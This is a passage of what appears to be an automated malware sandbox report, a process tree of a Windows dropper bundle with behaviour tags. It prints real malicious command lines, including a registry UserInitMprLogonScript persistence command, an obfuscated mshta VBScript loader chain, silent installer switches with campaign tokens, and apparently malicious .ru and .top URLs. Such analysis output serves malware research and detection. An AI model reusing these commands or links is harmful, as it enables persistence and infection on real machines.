PID:1036 -
C:\ProgramData\7807031.exe"C:\ProgramData\7807031.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5264 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5264 -s 23607⤵
- Program crash
PID:5492
-
-
-
C:\ProgramData\1110687.exe"C:\ProgramData\1110687.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5500 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:3940
-
-
-
C:\ProgramData\2392672.exe"C:\ProgramData\2392672.exe"6⤵PID:1696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 3207⤵
- Program crash
PID:2272
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21624565bb917a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Users\Admin\AppData\Local\Temp\7zS4934C2E3\Thu21624565bb917a.exeThu21624565bb917a.exe5⤵
- Executes dropped EXE
PID:912 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 912 -s 3166⤵
- Program crash
PID:5672
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2164f292a11ce.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Users\Admin\AppData\Local\Temp\7zS4934C2E3\Thu2164f292a11ce.exeThu2164f292a11ce.exe5⤵
- Executes dropped EXE
PID:1208 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1208 -s 2926⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5452
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21a1ef054cac78a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Users\Admin\AppData\Local\Temp\7zS4934C2E3\Thu21a1ef054cac78a.exeThu21a1ef054cac78a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b93295136197.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3540 -
C:\Users\Admin\AppData\Local\Temp\7zS4934C2E3\Thu21b93295136197.exeThu21b93295136197.exe5⤵
- Executes dropped EXE
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\is-OF623.tmp\Thu21b93295136197.tmp"C:\Users\Admin\AppData\Local\Temp\is-OF623.tmp\Thu21b93295136197.tmp" /SL5="$30162,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS4934C2E3\Thu21b93295136197.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:2520 -
C:\Users\Admin\AppData\Local\Temp\is-GF88A.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GF88A.tmp\Setup.exe" /Verysilent7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5664 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplis.ru/1S2Qs78⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5052 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe0,0x104,0x108,0xb8,0x10c,0x7ffd3b0a46f8,0x7ffd3b0a4708,0x7ffd3b0a47189⤵PID:4760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2008 /prefetch:29⤵PID:5488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 /prefetch:39⤵
- Suspicious behavior: EnumeratesProcesses
PID:5216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2512 /prefetch:89⤵PID:5844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:19⤵PID:5324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:19⤵PID:5320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:19⤵PID:2024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:19⤵PID:2192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:89⤵PID:1504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:89⤵PID:5596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:19⤵PID:492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:19⤵PID:4596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5808 /prefetch:29⤵PID:6452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:19⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:7648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:19⤵PID:3884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4092 /prefetch:89⤵PID:9056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:19⤵
- Executes dropped EXE
PID:5564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:19⤵PID:8488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1068 /prefetch:19⤵PID:8976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:19⤵PID:8060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:19⤵PID:1012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5292 /prefetch:89⤵PID:2868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:19⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:19⤵PID:7036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5984 /prefetch:89⤵PID:8620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2432 /prefetch:19⤵PID:8016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,10047495161656207964,244905338601938944,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:19⤵PID:7488
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"8⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1292 -
C:\Users\Admin\AppData\Local\Temp\BSKR.exe"C:\Users\Admin\AppData\Local\Temp\BSKR.exe"9⤵PID:5304
-
C:\Users\Admin\AppData\Local\Temp\BSKR.exeC:\Users\Admin\AppData\Local\Temp\BSKR.exe10⤵
- Executes dropped EXE
PID:1700
-
-
-
C:\Users\Admin\AppData\Local\Temp\Mortician.exe"C:\Users\Admin\AppData\Local\Temp\Mortician.exe"9⤵PID:5928
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c cmd < Cerchia.vsdx10⤵PID:5380
-
C:\Windows\SysWOW64\cmd.execmd11⤵PID:4400
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^JdxmflaMoKJKGKEonRKIDlCuNBztuuxobvTVXbusdtKZTUcnQFZrvdHmOhLNQgGwfAjlQJkqLaammCjTuVhBisMuOxuJLaA$" Attesa.vsdx12⤵PID:3448
-
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comImpedire.exe.com I12⤵PID:2264
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I13⤵PID:2528
-
C:\Users\Admin\AppData\Roaming\RegAsm.exeC:\Users\Admin\AppData\Roaming\RegAsm.exe14⤵PID:5332
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost12⤵
- Runs ping.exe
PID:6096
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\foradvertising.exe"C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws19⤵PID:5744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 23610⤵
- Program crash
PID:472
-
-
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe"9⤵
- Modifies registry class
PID:2480 -
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a10⤵PID:6348
-
-
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"9⤵PID:4700
-
-
C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe"C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7219⤵PID:4816
-
C:\Users\Admin\AppData\Local\Temp\is-BS2QI.tmp\IBInstaller_74449.tmp"C:\Users\Admin\AppData\Local\Temp\is-BS2QI.tmp\IBInstaller_74449.tmp" /SL5="$30484,14736060,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 72110⤵PID:5696
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-50VA8.tmp\{app}\microsoft.cab -F:* %ProgramData%11⤵PID:1104
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-50VA8.tmp\{app}\microsoft.cab -F:* C:\ProgramData12⤵PID:4068
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f11⤵PID:8728
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f12⤵PID:8820
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-50VA8.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-50VA8.tmp\{app}\vdi_compiler"11⤵PID:8164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8164 -s 29212⤵
- Program crash
PID:6768
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://closerejfurk32.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=72111⤵PID:9112
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://closerejfurk32.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=72112⤵PID:8196
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3b0a46f8,0x7ffd3b0a4708,0x7ffd3b0a471813⤵PID:8964
-
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"11⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:7908
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vpn.exe"C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=7209⤵PID:8432
-
C:\Users\Admin\AppData\Local\Temp\is-SR1HN.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-SR1HN.tmp\vpn.tmp" /SL5="$6052A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=72010⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:8008 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "11⤵PID:4960
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090112⤵
- Checks SCSI registry key(s)
PID:6264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "11⤵PID:2024
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090112⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
PID:6584
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall11⤵PID:6928
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install11⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6556
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe"C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe" SID=717 CID=717 SILENT=1 /quiet9⤵
- Enumerates connected drives
- Modifies system certificate store
PID:6648 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630993042 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"10⤵PID:3200
-
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall45.exe"C:\Users\Admin\AppData\Local\Temp\askinstall45.exe"9⤵PID:5756
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 172410⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2516
-
-
-
C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe"C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe"9⤵PID:2372
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 24010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7060
-
-
-
C:\Users\Admin\AppData\Local\Temp\Cleanpro12.exe"C:\Users\Admin\AppData\Local\Temp\Cleanpro12.exe"9⤵PID:8860
-
C:\Users\Admin\Documents\wqNfeWN1CbcXKfDScHTgNm4g.exe"C:\Users\Admin\Documents\wqNfeWN1CbcXKfDScHTgNm4g.exe"10⤵
- Suspicious use of SetThreadContext
PID:4076 -
C:\Users\Admin\Documents\wqNfeWN1CbcXKfDScHTgNm4g.exeC:\Users\Admin\Documents\wqNfeWN1CbcXKfDScHTgNm4g.exe11⤵PID:8300
-
-
-
C:\Users\Admin\Documents\DQTI2Ix_7lKa3im0Xv6DxIG4.exe"C:\Users\Admin\Documents\DQTI2Ix_7lKa3im0Xv6DxIG4.exe"10⤵
- Suspicious use of SetThreadContext
PID:3128 -
C:\Users\Admin\Documents\DQTI2Ix_7lKa3im0Xv6DxIG4.exe"C:\Users\Admin\Documents\DQTI2Ix_7lKa3im0Xv6DxIG4.exe"11⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2016
-
-
-
C:\Users\Admin\Documents\ScuYQUT_CwCQnZJOBp7bT9je.exe"C:\Users\Admin\Documents\ScuYQUT_CwCQnZJOBp7bT9je.exe"10⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5204
-
-
C:\Users\Admin\Documents\GUplXjkesdATxCcyjZ25HXZI.exe"C:\Users\Admin\Documents\GUplXjkesdATxCcyjZ25HXZI.exe"10⤵PID:5944
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\GUplXjkesdATxCcyjZ25HXZI.exe"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """"== """" for %A IN (""C:\Users\Admin\Documents\GUplXjkesdATxCcyjZ25HXZI.exe"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )11⤵PID:5288
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\GUplXjkesdATxCcyjZ25HXZI.exe"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if ""== "" for %A IN ("C:\Users\Admin\Documents\GUplXjkesdATxCcyjZ25HXZI.exe" ) do taskkill /f -im "%~nxA"12⤵PID:8984
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
- Adds Run key to start application
PID:4964
-
-
C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXEX4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV13⤵PID:8932
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV ""== """" for %A IN (""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )14⤵PID:6372
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if "-PXPoqL0iOUHHP7hXFattB5ZvsV "== "" for %A IN ("C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE" ) do taskkill /f -im "%~nxA"15⤵PID:912
-
-
-
